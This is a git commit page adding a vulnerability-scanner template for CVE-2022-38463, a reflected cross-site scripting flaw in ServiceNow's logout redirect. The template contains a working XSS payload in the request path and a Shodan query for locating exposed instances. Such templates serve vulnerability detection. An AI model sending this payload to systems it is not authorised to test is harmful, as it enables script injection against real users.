Merge pull request #5204 from theamanrawat/master

CVE-2022-38463
patch-1
Prince Chaddha 2022-08-26 13:31:35 +05:30 committed by GitHub
commit 002b0c5e86
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 38 additions and 0 deletions

View File

@ -0,0 +1,38 @@
id: CVE-2022-38463
info:
name: ServiceNow - Cross Site Scripting
author: amanrawat
severity: medium
description: |
There exists a reflected XSS within the logout functionality of ServiceNow. This enables an unauthenticated remote attacker to execute arbitrary JavaScript.
reference:
- https://support.servicenow.com/kb?id=kb_article_view&sysparm_article=KB1156793
- https://nvd.nist.gov/vuln/detail/CVE-2022-38463
classification:
cve-id: CVE-2022-38463
metadata:
verified: true
shodan-query: http.title:"ServiceNow"
tags: cve,cve2022,servicenow,xss
requests:
- method: GET
path:
- "{{BaseURL}}/logout_redirect.do?sysparm_url=//j%5c%5cjavascript%3aalert(document.domain)"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "top.location.href = 'javascript:alert(document.domain)';"
- type: word
part: header
words:
- text/html
- type: status
status:
- 200